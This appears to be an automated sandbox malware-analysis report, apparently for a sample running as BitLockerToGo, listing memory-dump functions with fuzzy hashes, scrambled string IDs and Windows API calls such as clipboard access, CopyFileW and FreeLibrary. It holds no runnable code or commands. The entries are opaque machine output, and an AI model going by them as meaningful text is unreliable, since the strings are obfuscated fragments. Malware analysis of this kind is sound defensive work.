                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -$/$0$1$3$5$7$9$;$<$=$>$?$@$G$T
                                                                              • API String ID: 0-779947932
                                                                              • Opcode ID: a89b95e3a0d3916e17e506497251fd3a80142cf5d96bec5535fb73c1b808b2e9
                                                                              • Instruction ID: 7771125a71e5484e4f33fa23c6e110f66dfd160b6e3257538a5dbcb3601ab4ab
                                                                              • Opcode Fuzzy Hash: a89b95e3a0d3916e17e506497251fd3a80142cf5d96bec5535fb73c1b808b2e9
                                                                              • Instruction Fuzzy Hash: 37E1D121C087DA8ECB22CABC88483DDBFB15BA7324F1847D9D4E56B3D2C3684546C766
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -$/$0$1$3$5$7$9$;$<$=$>$?$@$G$T
                                                                              • API String ID: 0-779947932
                                                                              • Opcode ID: d64f220e6f3e96d2502b04fc83936ce5f35ba9093a6853fa1f1b3cefe7d8eefb
                                                                              • Instruction ID: f11ed9e8b1c4477ada0b0739f0de4193d9a484522dd618937e474a0af5bb2ad1
                                                                              • Opcode Fuzzy Hash: d64f220e6f3e96d2502b04fc83936ce5f35ba9093a6853fa1f1b3cefe7d8eefb
                                                                              • Instruction Fuzzy Hash: E0E1BF21808BD98ACB22CABC88543DDBFB15B53324F1847D9D4E5AB3D2C3794946C766
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #*'7$0`]Y$2U^b$4EZ($7452$FGFB$JA$Q/Z<$iN#>$q/6`$ri2x$wcsw$}{it
                                                                              • API String ID: 0-2938272540
                                                                              • Opcode ID: e6ac9511cc7ddb939f735abd426d03ac75eb7a1f0272673155db319d89fdca12
                                                                              • Instruction ID: c9f1663c5b186b5fd9f2f8ac1820038ed8dd1c043f744e6983b98c6352cc5070
                                                                              • Opcode Fuzzy Hash: e6ac9511cc7ddb939f735abd426d03ac75eb7a1f0272673155db319d89fdca12
                                                                              • Instruction Fuzzy Hash: 944258745083818FC721DF25D85066FBBE1AF92314F084A6EE8E45B392E73A9909C75B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: g$s$u$z$z${${$|$|
                                                                              • API String ID: 0-1118400253
                                                                              • Opcode ID: b5e446d9313a2ce2799d105c8bf4260af8acd2328cad485a8091317a72cc8c19
                                                                              • Instruction ID: 4174e9a03f949ebaac0679d8ba339db9d9b7abbedd3a1f98260f9e54f1e3bb48
                                                                              • Opcode Fuzzy Hash: b5e446d9313a2ce2799d105c8bf4260af8acd2328cad485a8091317a72cc8c19
                                                                              • Instruction Fuzzy Hash: 35916923A1C7D14AD319953C885425FAED34BE2224F1ECFBED4E5873D6D569C80283A7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: &U9W$0mno$;$=]3_$?Y([$B$N$e_~2
                                                                              • API String ID: 0-2483127009
                                                                              • Opcode ID: 843da6a03c1c04d1720305801ec30080d1d610c93538c40b55b0100feffb20c1
                                                                              • Instruction ID: 5b408c844625b256053dcbacd077ec44a7e472c7083f822244112b7349cebeec
                                                                              • Opcode Fuzzy Hash: 843da6a03c1c04d1720305801ec30080d1d610c93538c40b55b0100feffb20c1
                                                                              • Instruction Fuzzy Hash: 8662037160D3418BD724CF28C8907ABB7E2EFD5319F09896EE4C58B391EB389905CB56
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: / $6$I~$RDJR$`~$qx$vxw~$v
                                                                              • API String ID: 0-977439064
                                                                              • Opcode ID: 0ff829aa8435fed8bf2f2517ccfeb88bf4e384f5b7db024309cebe06b61405aa
                                                                              • Instruction ID: ad6962f2241a934618eb4346c0f5ed70c8fa4d0911ba84e60267e1335162e746
                                                                              • Opcode Fuzzy Hash: 0ff829aa8435fed8bf2f2517ccfeb88bf4e384f5b7db024309cebe06b61405aa
                                                                              • Instruction Fuzzy Hash: FFD15C7264C3514BC324CF68985136BBBD39FC1305F1D8A7EE8D54B382DA78980A878B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "'QQ$I\] $`c^Q$`l"($a}eb$dosh$ye}z
                                                                              • API String ID: 0-3808399728
                                                                              • Opcode ID: 33f7733d8b7b0cebdf6742cdb21cffde9b205c8e1b2305cbd3f2e58a4d53f664
                                                                              • Instruction ID: 4b52dd010a8c812929d113b91da3503f5a5d09428c808850ed7d75a6dd10b0dd
                                                                              • Opcode Fuzzy Hash: 33f7733d8b7b0cebdf6742cdb21cffde9b205c8e1b2305cbd3f2e58a4d53f664
                                                                              • Instruction Fuzzy Hash: 70F105729083518FC720DF29D8946ABB7E1ABD5315F1A893ED4CA87352EB34D805CB87
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$CloseDataLongOpenWindow
                                                                              • String ID:
                                                                              • API String ID: 1647500905-0
                                                                              • Opcode ID: 18a30f8688862f9f268e37fd9676a17979bbe538082158445c472aa0ca611214
                                                                              • Instruction ID: 26309e735703d13c9e27c3bc9154cd9f06fdebf8df059f402f5bd0c5cc0cc0b9
                                                                              • Opcode Fuzzy Hash: 18a30f8688862f9f268e37fd9676a17979bbe538082158445c472aa0ca611214
                                                                              • Instruction Fuzzy Hash: 5E5157B1904B528FC700ABBC984535EBFA06B51320F09CB3BD8B5976D2E338991687D7
                                                                              APIs
                                                                                • Part of subcall function 0048AFD0: LdrInitializeThunk.NTDLL(00489B85,?,00000010,00000000,?,00000018,?,?,?,?,?,?,?,00000000), ref: 0048AFFE
                                                                              • FreeLibrary.KERNEL32(?), ref: 0046A77A
                                                                              • FreeLibrary.KERNEL32(?), ref: 0046A82B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary$InitializeThunk
                                                                              • String ID: ?0$I,~M
                                                                              • API String ID: 764372645-2649114058
                                                                              • Opcode ID: 79b4cfbd884d710fd5d697b923caa6515f0dcb85411760f818d21999780c6390
                                                                              • Instruction ID: 9479524cd643e60124d6355939f8ac7cd98ba736f335425e0b6d06e1fe9cc4fd
                                                                              • Opcode Fuzzy Hash: 79b4cfbd884d710fd5d697b923caa6515f0dcb85411760f818d21999780c6390
                                                                              • Instruction Fuzzy Hash: 07A255766497009FE710CB68DCC076BB7E2EBD4304F19852EE58997306E7799C028B9B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "^<P$)*$-rt$0R/T$V($Z\
                                                                              • API String ID: 0-1249270978
                                                                              • Opcode ID: 67725368e03cb4ddee40e74334e12c677d815954daff8bafe1f6859bb7aedaf4
                                                                              • Instruction ID: b757ad1c9ede5cb30e3edbe811fc37b4d8a62d1b92736e17cf374884755fb50d
                                                                              • Opcode Fuzzy Hash: 67725368e03cb4ddee40e74334e12c677d815954daff8bafe1f6859bb7aedaf4
                                                                              • Instruction Fuzzy Hash: AB8158B25093518BD714CF19C8913ABBBA1FFC1314F088A2DE4C99F391E7B89905C786
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !UoQ$Ne$RLFq$a}eb$iumj
                                                                              • API String ID: 0-774795427
                                                                              • Opcode ID: d0e0cfaf50e87d34080b682e71e55c601faadc268507a9ae31ac518f5569ccb4
                                                                              • Instruction ID: f51100b1770f39c00f6be57483d10179bbde8b31006ae438b783be75b6bc5519
                                                                              • Opcode Fuzzy Hash: d0e0cfaf50e87d34080b682e71e55c601faadc268507a9ae31ac518f5569ccb4
                                                                              • Instruction Fuzzy Hash: 90D112B19083509BC714DF29C8556ABB7F2AFD1304F04892DF8D987352EB39D905CB8A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4/@8$4/@8$L$b2io$b2io
                                                                              • API String ID: 0-1083437768
                                                                              • Opcode ID: df8efa570286446f91957a95e1523b01696af5232d48285fd63726ce31118c6a
                                                                              • Instruction ID: d07c7eb26caceb737a9836807f0d05a7c59d4507b80fd981a57e6c734f4293e2
                                                                              • Opcode Fuzzy Hash: df8efa570286446f91957a95e1523b01696af5232d48285fd63726ce31118c6a
                                                                              • Instruction Fuzzy Hash: 6DA18DB29083404AD3259B39DC517EFBAD1EFDA304F194A3EC8C997347E6384915879A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 2=G$OH$bw$zw$}C
                                                                              • API String ID: 0-1369387539
                                                                              • Opcode ID: 92d3bfa514b89826623dd48763000e1f930a79d41a5ef72068a605a49e22b752
                                                                              • Instruction ID: 1e8114caa96961571341c616664fc621bf40b49e12f032eae4f07b8de7a8a10b
                                                                              • Opcode Fuzzy Hash: 92d3bfa514b89826623dd48763000e1f930a79d41a5ef72068a605a49e22b752
                                                                              • Instruction Fuzzy Hash: 658124712483509FE310CF64D88279FBBE0EBC5308F05893EF5999B291D779990A8B86
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 01$A%P'$S.*8$T-Z/$mso@
                                                                              • API String ID: 0-685917220
                                                                              • Opcode ID: eac4874c9374c6a0fa97f11727762a74831ea1fb728e5d501def0b4935fcde4e
                                                                              • Instruction ID: 261bbf5c1ca62b2acedc94ec8b38abbd8e802859ba784c545171de8bdd916048
                                                                              • Opcode Fuzzy Hash: eac4874c9374c6a0fa97f11727762a74831ea1fb728e5d501def0b4935fcde4e
                                                                              • Instruction Fuzzy Hash: 8E5113B19083418BC7248F24C4A1677BBF0EFA6355F18591DE8C64B392F7388804CB9B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Dx$Id02$mUi>$mUi>$mUi>
                                                                              • API String ID: 0-2171644440
                                                                              • Opcode ID: 98be873e36dd7f379806bc2b53a1d0ebe4ea9cb46f02a48c313529e41786f130
                                                                              • Instruction ID: 8d9f4738db8282e6c1bec28bbbedd43a07ddcccf83fb04aee26b4c3f42823fb8
                                                                              • Opcode Fuzzy Hash: 98be873e36dd7f379806bc2b53a1d0ebe4ea9cb46f02a48c313529e41786f130
                                                                              • Instruction Fuzzy Hash: 674148605087E14AD72A8F2584A43FBBBD1DF93304F1894AEC6D96B793C37A0406879A
                                                                              APIs
                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 004776A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: CopyFile
                                                                              • String ID: b"i5$BD
                                                                              • API String ID: 1304948518-2279727271
                                                                              • Opcode ID: 31515b2033329cc9fb9dcc4f0ef588635c30c21c735596211be6f5b018e1c0d0
                                                                              • Instruction ID: b4c1686625bbea812907ce24b7ce93590cf835eea11f6163c1793c401ab05930
                                                                              • Opcode Fuzzy Hash: 31515b2033329cc9fb9dcc4f0ef588635c30c21c735596211be6f5b018e1c0d0
                                                                              • Instruction Fuzzy Hash: 18F1E2F1E102108FC714DF69D98269ABFB2FF84314B2981ADD449AF356E779C842CB85
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID: 6]j*$A]j*
                                                                              • API String ID: 3664257935-3419684766
                                                                              • Opcode ID: 28ff52cb3bfcf98095d7b2b0c78d978831185d58dfa95ad946ab5d980aa4c3ed
                                                                              • Instruction ID: 887f41e7478c84a7868e295d18c299e6027519f1f0c9fafd94e52337273e576e
                                                                              • Opcode Fuzzy Hash: 28ff52cb3bfcf98095d7b2b0c78d978831185d58dfa95ad946ab5d980aa4c3ed
                                                                              • Instruction Fuzzy Hash: 4CA15032A483418FD7258A2888817D7BFD2DFD2354F18C56EE4C9973C2D6389C05C796
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: l&n$ADF3B8C14BFF3DAC1145237798DF8CC2$LpS:$pr
                                                                              • API String ID: 0-4253273565
                                                                              • Opcode ID: 3e80a5bfa8b4b61315292df4aebec49f608e45450accf4179821513372185961
                                                                              • Instruction ID: 435ca2c505711583f4ea7731822cc6ac700e9760d2b56481f8fa64e2e557c115
                                                                              • Opcode Fuzzy Hash: 3e80a5bfa8b4b61315292df4aebec49f608e45450accf4179821513372185961
                                                                              • Instruction Fuzzy Hash: B8D17C769083508BC314CF25C8516ABBBE2FFC1304F18496DE9D59B352DB79D90ACB86
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ;J$SP$W_$FX
                                                                              • API String ID: 0-3720793784
                                                                              • Opcode ID: 3fe00b5df1f1099823c2fa99418b5990abf246c571eecf2f8ab162beedfc7c9a
                                                                              • Instruction ID: d230daf58c7e2df147a153f70959069ac8664ac9a0d6a35efdd44354464aad9f
                                                                              • Opcode Fuzzy Hash: 3fe00b5df1f1099823c2fa99418b5990abf246c571eecf2f8ab162beedfc7c9a
                                                                              • Instruction Fuzzy Hash: A2D1F2B5508380DFE724EF24D881BABB7A0FBD5308F50893EE58A5B261D774D816CB46
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Dx$Id02$mUi>$mUi>
                                                                              • API String ID: 0-952199321
                                                                              • Opcode ID: ebf00159b2e974b3d10a8c94139434e47d21296336075306685dfc9435ac68c4
                                                                              • Instruction ID: e2c60a30b10da6c885e546442d21e3ee014a427a7d8f1488b32712ec0fd29c55
                                                                              • Opcode Fuzzy Hash: ebf00159b2e974b3d10a8c94139434e47d21296336075306685dfc9435ac68c4
                                                                              • Instruction Fuzzy Hash: 65415C6054C3E14AD7358F2484A03FBBF91DF93300F1894ADC6DA6B693C37A4407875A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0cG$|~W8$5$Z
                                                                              • API String ID: 0-2503716277
                                                                              • Opcode ID: 8b66836f2e7b1d8f5f89d45ecd17d70f7d7663179d41498321a26b0fbf82c227
                                                                              • Instruction ID: 6c284c1aba92282bf82d5ec73ae4ed2ec432d83b899198afc3d35fb4cb92d1a2
                                                                              • Opcode Fuzzy Hash: 8b66836f2e7b1d8f5f89d45ecd17d70f7d7663179d41498321a26b0fbf82c227
                                                                              • Instruction Fuzzy Hash: 24026AB29083508FC714CF25D85176BBBE6ABD6304F1A887EE4C997341D639D90ACB86
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @Vq$$@Vq$$8
                                                                              • API String ID: 0-1623103723
                                                                              • Opcode ID: e39be9cbc409b82bf681a979cf58eb53d2faca929fdffb9493e5835ff5305fb1
                                                                              • Instruction ID: c453ad58aad6ee1f29732dc34e86a7fc9f5ee628d778bbf4026eede55353ff68
